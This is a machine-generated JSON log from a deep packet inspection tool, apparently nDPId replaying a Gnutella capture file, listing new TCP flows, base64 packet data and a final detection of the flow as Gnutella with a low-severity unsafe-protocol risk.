-00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":837,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90743,"flow_last_seen":90743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90743,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"87.123.54.234","src_port":50301,"dst_port":54130,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":837,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":277,"flow_packet_id":1,"flow_last_seen":90743,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90743,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0oEFAAIAGwA4KAAIPV3s26sR903KojXlgAAAAAIAC+vAfzQAAAgQFtAEDAwgBAQQC"} -00552{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":838,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90743,"flow_last_seen":90743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90743,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"75.64.6.175","src_port":50302,"dst_port":4743,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":838,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":278,"flow_packet_id":1,"flow_last_seen":90743,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90743,"pkt":"UlQAEjUCCAAn5uVZCABFAAA03P1AAIAGv8gKAAIPS0AGr8R+EocndMkvAAAAAIAC+vBOeAAAAgQFtAEDAwgBAQQC"} 
-00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":839,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90744,"flow_last_seen":90744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90744,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.120.73.215","src_port":50303,"dst_port":24562,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":839,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":279,"flow_packet_id":1,"flow_last_seen":90744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90744,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0+\/xAAIAGUGkKAAIPWHhJ18R\/X\/Jjsy0QAAAAAIAC+vAQjAAAAgQFtAEDAwgBAQQC"} -00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":840,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90744,"flow_last_seen":90744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90744,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"85.168.34.105","src_port":50304,"dst_port":39908,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":840,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":280,"flow_packet_id":1,"flow_last_seen":90744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90744,"pkt":"UlQAEjUCCAAn5uVZCABFAAA03DVAAIAGmm4KAAIPVagiacSAm+Tx8HlYAAAAAIAC+vAkUQAAAgQFtAEDAwgBAQQC"} -00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":841,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90744,"flow_last_seen":90744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90744,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"94.54.66.82","src_port":50305,"dst_port":63637,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":841,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":281,"flow_packet_id":1,"flow_last_seen":90744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90744,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0MiRAAIAGHAkKAAIPXjZCUsSB+JU5M3UyAAAAAIAC+vBcCwAAAgQFtAEDAwgBAQQC"} 
-00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90744,"flow_last_seen":90744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90744,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"220.238.145.82","src_port":50306,"dst_port":33527,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":282,"flow_packet_id":1,"flow_last_seen":90744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90744,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0uGpAAIAGyAkKAAIP3O6RUsSCgvcQKi\/TAAAAAIAC+vByWAAAAgQFtAEDAwgBAQQC"} -00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":843,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90745,"flow_last_seen":90745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90745,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.99.176.20","src_port":50307,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":843,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":283,"flow_packet_id":1,"flow_last_seen":90745,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90745,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0GLNAAIAGdYoKAAIPsGOwFMSDGMp5VHLfAAAAAIAC+vA+FwAAAgQFtAEDAwgBAQQC"} -00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":844,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90745,"flow_last_seen":90745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90745,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.37.255.130","src_port":50308,"dst_port":61616,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":844,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":284,"flow_packet_id":1,"flow_last_seen":90745,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90745,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0golAAIAGq4MKAAIPwSX\/gsSE8LC\/3xvGAAAAAIAC+vAWjQAAAgQFtAEDAwgBAQQC"} 
-00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":845,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90745,"flow_last_seen":90745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90745,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"60.241.48.194","src_port":50309,"dst_port":21301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":845,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":285,"flow_packet_id":1,"flow_last_seen":90745,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90745,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0xU1AAIAGu7QKAAIPPPEwwsSFUzVU0GEOAAAAAIAC+vAsxAAAAgQFtAEDAwgBAQQC"} -00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":846,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90745,"flow_last_seen":90745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90745,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.110.153.177","src_port":50310,"dst_port":40022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":846,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":286,"flow_packet_id":1,"flow_last_seen":90745,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90745,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0O4FAAIAGzRQKAAIPTG6ZscSGnFbyaQhuAAAAAIAC+vAmPAAAAgQFtAEDAwgBAQQC"} -00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":847,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90745,"flow_last_seen":90745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90745,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"149.28.163.175","src_port":50311,"dst_port":49956,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":847,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":287,"flow_packet_id":1,"flow_last_seen":90745,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90745,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0zKVAAIAG6UMKAAIPlRyjr8SHwyS+2ZeIAAAAAIAC+vBRNgAAAgQFtAEDAwgBAQQC"} 
-00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":848,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90745,"flow_last_seen":90745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90745,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.238.172.250","src_port":50312,"dst_port":23548,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":848,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":288,"flow_packet_id":1,"flow_last_seen":90745,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90745,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0Bk5AAIAG0n4KAAIPaO6s+sSIW\/wAgZpOAAAAAIAC+vCW0wAAAgQFtAEDAwgBAQQC"} -00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":849,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90746,"flow_last_seen":90746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90746,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.65.68.194","src_port":50313,"dst_port":35481,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":849,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":1,"flow_last_seen":90746,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90746,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0BGFAAIAGRVEKAAIPYEFEwsSJipmyoW1hAAAAAIAC+vBT5wAAAgQFtAEDAwgBAQQC"} -00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":850,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90746,"flow_last_seen":90746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90746,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.7.252.192","src_port":50314,"dst_port":6888,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":850,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":290,"flow_packet_id":1,"flow_last_seen":90746,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90746,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0Iw5AAIAGft8KAAIPUAf8wMSKGugAPu54AAAAAIAC+vBNHwAAAgQFtAEDAwgBAQQC"} 
-00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":851,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90746,"flow_last_seen":90746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90746,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.31.152.112","src_port":50315,"dst_port":26851,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":851,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":291,"flow_packet_id":1,"flow_last_seen":90746,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90746,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0e4RAAIAGraEKAAIPLR+YcMSLaOPXzV5xAAAAAIAC+vA+0wAAAgQFtAEDAwgBAQQC"} -00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":852,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90746,"flow_last_seen":90746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90746,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"142.132.165.13","src_port":50316,"dst_port":30566,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":852,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":1,"flow_last_seen":90746,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90746,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0xktAAIAG9NcKAAIPjoSlDcSMd2bhikpDAAAAAIAC+vDMvQAAAgQFtAEDAwgBAQQC"} -00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":853,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90746,"flow_last_seen":90746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90746,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.165.203.190","src_port":50317,"dst_port":21995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":853,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":293,"flow_packet_id":1,"flow_last_seen":90746,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90746,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0xP1AAIAGoVMKAAIPvKXLvsSNVetyIY5LAAAAAIAC+vDExgAAAgQFtAEDAwgBAQQC"} 
-00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":854,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90746,"flow_last_seen":90746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90746,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.32.126.214","src_port":50318,"dst_port":59596,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":854,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":294,"flow_packet_id":1,"flow_last_seen":90746,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90746,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0Yo9AAIAGTC8KAAIPwSB+1sSO6MzJTpedAAAAAIAC+vAZ0gAAAgQFtAEDAwgBAQQC"} -00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":855,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90747,"flow_last_seen":90747,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.187.74.173","src_port":50319,"dst_port":53489,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":855,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":295,"flow_packet_id":1,"flow_last_seen":90747,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90747,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0OINAAIAGsckKAAIPubtKrcSP0PGcxJ9SAAAAAIAC+vCSDwAAAgQFtAEDAwgBAQQC"} -00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":856,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90747,"flow_last_seen":90747,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"194.163.180.126","src_port":50320,"dst_port":10825,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":856,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":296,"flow_packet_id":1,"flow_last_seen":90747,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90747,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0SsxAAIAGLMcKAAIPwqO0fsSQKkliYWFkAAAAAIAC+vA+TwAAAgQFtAEDAwgBAQQC"} 
-00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":857,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90747,"flow_last_seen":90747,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"213.229.111.224","src_port":50321,"dst_port":4876,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":857,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":297,"flow_packet_id":1,"flow_last_seen":90747,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90747,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0Ar9AAIAGpjAKAAIP1eVv4MSREwzLMAmEAAAAAIAC+vB1+AAAAgQFtAEDAwgBAQQC"} -00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":858,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90747,"flow_last_seen":90747,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"164.132.10.25","src_port":50322,"dst_port":55302,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":858,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":298,"flow_packet_id":1,"flow_last_seen":90747,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90747,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0ptBAAIAGmUcKAAIPpIQKGcSS2AZOgZ\/9AAAAAIAC+vAuWwAAAgQFtAEDAwgBAQQC"} -00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":859,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90747,"flow_last_seen":90747,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"51.68.153.214","src_port":50323,"dst_port":26253,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":859,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":299,"flow_packet_id":1,"flow_last_seen":90747,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90747,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0eN9AAIAGqLsKAAIPM0SZ1sSTZo3Cj79BAAAAAIAC+vDuAwAAAgQFtAEDAwgBAQQC"} -00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":860,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":276,"flow_packet_id":2,"flow_last_seen":90760,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90760,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA0kAAEAGeoC8PTS3CgACDy5MxHwAp\/gBiFqWg2AS\/\/+QwwAAAgQFtA=="} 
-00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":861,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":276,"flow_packet_id":3,"flow_last_seen":90760,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90760,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoc0ZAAIAGioYKAAIPvD00t8R8LkyIWpaDAKf4AlAQ+vCtjwAA"} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":862,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90742,"flow_last_seen":90763,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90763,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.61.52.183","src_port":50300,"dst_port":11852,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 